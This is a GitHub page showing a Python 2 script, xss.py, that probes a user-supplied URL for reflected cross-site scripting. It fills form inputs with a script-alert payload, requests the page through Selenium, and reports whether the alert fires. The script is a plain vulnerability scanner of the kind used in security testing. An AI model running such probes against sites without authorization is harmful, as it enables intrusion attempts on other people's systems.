-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathxss.py
More file actions
169 lines (153 loc) · 5.92 KB
/
xss.py
File metadata and controls
169 lines (153 loc) · 5.92 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
import datetime
import urllib
from BeautifulSoup import *
from selenium import webdriver
# VARIABLES
tm = "["+datetime.datetime.now().time().strftime('%H:%M:%S')+"]"
wrn = "[WARNING]"
inf = "[INFO]"
# <!==================================================!>
# XSS INJECTION!!!
def xss():
# VARIABLES
while True: # Checks if url is correct
url = (raw_input('Enter URL: ')).strip()
print ".........."
if "http://" in url:
break
elif "https://" in url:
break
else:
print "Wrong input given!\n"
print tm, inf, "Connecting to the URL..."
try:
html = urllib.urlopen(url).read()
soup = BeautifulSoup(html)
print tm, inf, "Target URL is stable..."
print "..........\n.........."
except:
print tm, wrn, "Target URL is not stable!!!"
print tm, wrn, "Make sure you are connected to the internet.\n"
values = dict() # Keeps the injected code (URL parameters).
slash = 0 # Checking how many '/' are in the URL.
names = "" # For printing progress (input tag names).
skata = ""
f_num = 0 # Counts the number of the forms.
completed = False
# FORMS
try:
# print soup('form') # Debugging
for frm in soup('form'):
# Progress messages.
f_num += 1
try:f_name = frm['name']
except:f_name = "-"
try:f_method = frm['method'].upper()
except:f_method = "GET"
try:f_action = frm['action']
except:f_action = url
print tm, inf, "Searching for vulnerable Forms..."
print "=================================================="
print "Form", f_num
print "=================================================="
print tm, inf, "Checking Form..."
print tm, inf, "Form name: '"+f_name+"'..."
print tm, inf, "Request method used:", "'"+f_method+"'..."
# CHECK FOR THE PROPER TYPE OF INPUT
for tag in frm('input'):
if tag['type'] == "text" or \
tag['type'] == "password" or \
tag['type'] == "email" or \
tag['type'] == "number" or \
tag['type'] == "search" or \
tag['type'] == "tel" or \
tag['type'] == "url":
values.update({tag['name']: '<script>alert("hacked");</script>'})
print tm, inf, "Input type:", "'"+tag['type'] + "'..."
# ACTION FIX
if f_action[-1:] == "/":
rem_slash = f_action[::-1].replace("/", "", 1)[::-1]
if "/" in rem_slash:
act = rem_slash[:rem_slash.rfind('/'):-1][::-1]
else:
act = rem_slash
elif "/" in f_action:
act = f_action[:f_action.rfind('/'):-1][::-1]
else:
act = f_action
print tm, inf, "Action:", "'"+act + "'..."
# URL FIX
for char in url:
if char == "/":
slash += 1
if slash < 3:
url += "/"
# FOR COMPARISON WITH THE ACTION
temp_url = url[url.find('/') + 2::1]
temp_url = temp_url.strip()
if temp_url.endswith('/'):
temp_url = temp_url[::-1].replace("/", "", 1)[::-1]
# FOR COMPARISON WITH THE URL
temp_act = act
temp_act = temp_act.strip()
if temp_act.endswith('/'):
temp_act = temp_act[::-1].replace("/", "", 1)[::-1]
if temp_url == temp_act:
url = url[:url.rfind('/')]
else:
url = url[:url.rfind('/') + 1] + act
print tm, inf, "New URL:", url
# APPEND PARAMETERS TO THE URL
print tm, inf, "Injecting malicious code into the URL..."
data = urllib.urlencode(values)
if "?" in url:
new_page = url + "&" + data
else:
new_page = url + "?" + data
print tm, inf, "Injected URL:", new_page
# CHECK FOR XSS
for key, value in values.items(): names = (names+" "+key).strip()
if names.__len__() == 0: names = "-"
print tm, inf, "Testing for XSS injection on", "'"+f_method+"'", "parameter(s)", "'"+names+"'..."
"""
try:
inj_html = urllib.urlopen(new_page).readlines()
sou = BeautifulSoup(inj_html)
# for c in sou('script'):
#print c
except:
print tm, wrn, "Target URL is not stable!!!"
print tm, wrn, "Make sure you are connected to the internet.\n"
"""
# CHECK FOR ALERT
try:
browser = webdriver.Firefox()
browser.get(new_page)
alert = browser.switch_to_alert()
skata = alert.text
alert.accept()
browser.close()
# sleep after some time
except:
pass
browser.close()
if skata == "hacked":
print "\n<!-- XSS injection is possible --!>"
print " <!-- XSS type: Reflected --!>"
completed = True
else:
print "\n<!-- XSS injection is not possible --!>"
completed = True
# REINITIALIZATION
names = ""
skata = ""
values.clear()
print "\n"
if completed:
print "Finished successfully!!!"
else:
print tm, wrn, "The program was terminated abnormally!"
print "\nFinish."
print "=================================================="
except:
pass